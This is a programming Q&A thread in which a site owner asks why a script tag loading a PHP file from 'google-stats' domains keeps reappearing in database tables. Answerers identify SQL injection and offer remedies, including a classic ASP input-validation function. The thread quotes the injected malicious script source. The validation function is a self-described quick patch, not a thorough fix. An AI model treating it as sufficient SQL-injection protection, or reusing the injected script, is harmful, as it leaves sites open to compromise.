My website has been attacked by some malicious script / title script src = http : // google-stats46.info/ur.php . This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is / title script src = http : // google-stats45.info/ur.php This has been happening since a week. I don’t know how it is possible. Please give me solution
+2
A:
change your database connection's username and pass. maybe it is some simple user and pass and a script has founded them.
rahim asgari
2010-10-01 05:51:02
+2
A:
Check your website (or any other endpoint that is connected to internet that consumes this DB) for SQL Injection attacks.
Dies
2010-10-01 05:54:57
+1
A:
Look in your IIS logs for the term CAST( to try and find the SQL injection attempts.
Martin Smith
2010-10-01 09:33:32
A:
If you are seeing javascript in your tables then it is a Classic SQL injection attack. You need to update your ASP pages to validate your inputs from your querystrings, before appending to a SQL command.
As for the current state of the DB, you can either restore to backup or write custom scripts to clean out the inserted javascript from your tables.
I dug around some old code and found a function (below) I wrote for an old site that was massively hit with an injection attack a few years ago. I just used this function to validate all values from the querystring that were not being validated.
Obviously there are much more secure, permament, and "correct" way to fix this, but this was quick, easy and it stopped all attacks.
EXAMPLE
Current SQL "SELECT lname,fname from t_users where userid = " & request("userid")
Change to "SELECT lname,fname from t_users where userid = " & V(request("userid"),"int")
function V(x,t)
' ====================================================================
' Function will validate the data type of the passed string.
' EXAMPLES:
' Date - v([STRING],"Date")
' Integer v([STRING],"Int")
' Email v([STRING],"Email")
' String Length v([STRING],25)
' ====================================================================
bFail = 0
SELECT CASE ucase(t)
CASE "DATE" ' Date
If not isDate(x) then bFail = 1
CASE "INT" ' Integer
If not isNumeric(x) then bFail = 1
CASE "EMAIL" ' Email Address
sString = Trim(x)
nIndex = InStr(1, sString, "@")
nDotIndex = InStrRev(sString, "." )
If nIndex < 2 Then bFail = 1
If nDotIndex < nIndex + 1 Then bFail = 1
If InStr( nIndex + 1, sString, "@" ) > nIndex Then bFail = 1
If nDotIndex > Len( sString ) - 2 Then bFail = 1
If len(x) > 100 then bFail = 1
CASE ELSE
if isnumeric(t) then ' Pass a integer to test for len
' Test for length
If len(x) > t then bFail = 1
end if
END SELECT
if bFail then
response.redirect("/error.asp") ' Sent to Error page
else
v=x ' PASS
end if
end function
Joe King
2010-10-07 19:11:58